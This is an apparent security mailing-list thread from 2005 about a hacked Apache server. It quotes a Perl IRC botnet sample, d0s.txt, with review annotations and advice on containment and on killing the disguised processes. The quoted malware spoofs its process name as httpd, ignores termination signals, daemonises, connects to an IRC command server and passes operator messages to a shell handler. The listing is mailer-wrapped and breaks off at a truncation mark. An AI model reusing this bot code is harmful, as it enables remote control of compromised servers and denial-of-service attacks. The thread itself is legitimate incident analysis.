Re: Apache hacks (./atac, d0s.txt)
From: Daniel Cid <danielcid () yahoo com br>
Date: Sat, 30 Apr 2005 01:48:12 -0300 (ART)
Take a look at these links:
http://lists.virus.org/full-disclosure-0412/msg00541.html
http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html
Are your systems patched (Apache itself, and whatever runs under it)? Do you run any web application, CGI or other code under Apache that might be vulnerable? Since the bot runs as the Apache user, the foothold was most likely a hole in something Apache executes rather than in Apache itself -- the access log should show the request that fetched d0s.txt or the atac tarball. One thing I know is that this Perl script was clearly written by Brazilians: the comments and variable names are all in Portuguese.
--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com
--- Andrew Y Ng <ayn () AndrewNg com> escreveu:
My server has been seeing some unusual activity today. I don't have much time to get down to the bottom of things, but after I investigated briefly I have decided to disable the Perl executable permission for www-data (the Apache process's user), and also locked /var/tmp so www-data cannot write to it. (Both are containment steps only: the payload was also staged in /tmp, and neither closes whatever let www-data drop and run files in the first place.) Looks like it ignores all the `kill` signals, not sure how I can actually kill it... (The script sets $SIG{INT}, $SIG{HUP} and $SIG{TERM} to IGNORE, but SIGKILL cannot be caught or ignored, so `kill -9 <pid>` will work. Note that it rewrites $0 to look like `httpd -DSSL` in `ps`, so identify the PIDs by the perl interpreter -- e.g. /proc/<pid>/exe on Linux -- rather than by the displayed name.)
I found the included script in /var/tmp called
d0s.txt.
I found a bunch of processes called ./atac 20
running, and found the
following content in /tmp/atac:
http://andrewng.com/tmp/atac.tbz
here's d0s.txt:
#!/usr/bin/perl
# ---------------------------------------------------------------------------
# NOTE(review): this listing is a malware sample (IRC-controlled DDoS bot)
# quoted from a mailing-list post.  The mailer line-wrapped it, so several
# comments spill onto bare lines (e.g. "Modo Do Bot #") and the text as shown
# does not parse as Perl.  The original Portuguese comments are translated
# below; the wrapped fragments are left verbatim so the sample stays intact.
# ---------------------------------------------------------------------------
################ CONFIGURATION
#################################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL';
# Fake command line written into $0 below, so `ps` shows an Apache SSL worker #
#----------------------------------------------################################################
my $MODOME='+pi'; # IRC user-mode string ("bot mode"); its consumer is not in the visible code
Modo Do Bot #
#----------------------------------------------################################################
my $linas_max='10'; # flood limit "after X lines"; not referenced in the visible code
Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='3'; # "sleeps X seconds"; not referenced in the visible code
dorme X segundos #
##################### IRC
#####################################################################
my @adms=("DDOS"); # nicks allowed to command the bot (matched case-insensitively in parse())
administrador #
#----------------------------------------------################################################
my @canais=("#bots ddos");# channels to join; the join logic is not in the visible code
#
#----------------------------------------------################################################
my $nick='b0t'; # bot nick; per the original comment a random number is appended
bot. Caso esteja em uso vai aparecer #
# when the nick is already in use (that code is not in the visible part) #
aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'b0t'; # username field of the USER registration line
#
#----------------------------------------------################################################
my $realname = '4Admin14: 4#DDOS';
# realname field of the USER line; the stray "4"s are presumably mIRC colour codes whose ^C byte was lost in the archive #
#----------------------------------------------################################################
$servidor='irc.gigachat.net' unless $servidor; # default C2 IRC server (package global, not `my`);
Servidor de irc que vai ser usado #
# overridden by the first command-line argument (see the $ARGV[0] assignment below) #
caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # C2 IRC server port
servidor de irc #
################ SHELL ACCESS
###############################################################
my $secv = 1; # 1/0 to enable/disable shell access; not referenced in the visible code
pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = '1.0';
# Ignore the signals an operator or a logout would normally deliver, so a
# plain `kill <pid>`, Ctrl-C or a closed terminal do not stop the bot.
# SIGKILL (`kill -9`) cannot be caught or ignored and still works.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';   # children are auto-reaped on most systems; no zombies from forked workers
$SIG{'PS'} = 'IGNORE';     # "PS" is not a standard signal name; effectively a no-op
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");                # detach from the directory it was launched from
$servidor="$ARGV[0]" if $ARGV[0];   # C2 server may be overridden on the command line
# Overwrite the process title so `ps`/`top` show the fake httpd command line;
# the trailing NULs pad over any longer original argv.  On Linux
# /proc/<pid>/exe should still point at the perl interpreter, which is the
# reliable way to spot it.
$0="$processo"."\0"x16;;
# Daemonise: fork, parent exits, child carries on in the background.
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;          # per-socket state: host, porta, nick, meuip (filled in by conectar())
our %DCC;                  # DCC state used by &DCC::connections (that package is not in the visible code)
my $dcc_sel = new IO::Select->new();   # indirect-object syntax; not used in the visible code
$sel_cliente = IO::Select->new();      # package global (no `use strict`): readable IRC sockets
# Write one raw IRC line to a socket.
#   sendraw($socket, $line)  -> prints "$line\n" to $socket
#   sendraw($line)           -> prints to the global $IRC_cur_socket
# The argument count is tested via $#_ (last index), so '1' means two args.
# Print failures are not checked.
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# Open a TCP connection to the IRC C2 server and register the bot.
#   conectar($nick, $server, $port)
# On connect failure it returns 1 immediately (the caller's retry loop then
# spins with no delay).  On success it records the socket in %irc_servers,
# sets the global $IRC_cur_socket, sends NICK (via nick(), not in the visible
# code) and USER, then sleeps one second.  The caller ignores the return value.
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket =
IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
return(1);
if (defined($IRC_socket)) {   # always true here: the `or return(1)` above already handled failure
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} =
"$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} =
"$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} =
$meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} =
$IRC_socket->sockhost;
nick("$meunick");
# USER <ircname> <local ip> <server> :<realname>  (the string literal below is line-wrapped by the mailer)
sendraw("USER $ircname
".$IRC_socket->sockhost." $servidor_con
:$realname");
sleep 1;
}
}
my $line_temp;   # carries an incomplete trailing line over to the next read
# Main event loop: keep a connection to the C2 server up, poll the IRC
# socket(s) and hand every complete line to parse().
while( 1 ) {
# No connection yet (or it was dropped): reconnect.  conectar() returns at
# once on failure, so this inner loop busy-retries with no back-off.
while (!(keys(%irc_servers))) { conectar("$nick",
"$servidor", "$porta"); }
delete($irc_servers{''}) if
(defined($irc_servers{''}));
&DCC::connections;   # DCC package is not in the visible code
# Zero timeout: can_read() never blocks, so with nothing to read the loop
# spins at full CPU (there is no sleep anywhere in it).
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick =
$irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
# 0 bytes (EOF; an undef error return also satisfies == 0): drop the
# socket so the outer loop reconnects.  There is no `next` here, so the
# code still falls through to the split below for this socket.
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
# Split the buffer into lines.  A last fragment without a trailing \r is
# treated as a partial line and saved in $line_temp, unless it looks like a
# server "NOTICE AUTH :***" banner (presumably sent unterminated by some
# servers).  The regex below is line-wrapped by the mailer.
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH
:\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001Bot powered by DDOS
TEAM\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
) {
=== message truncated ===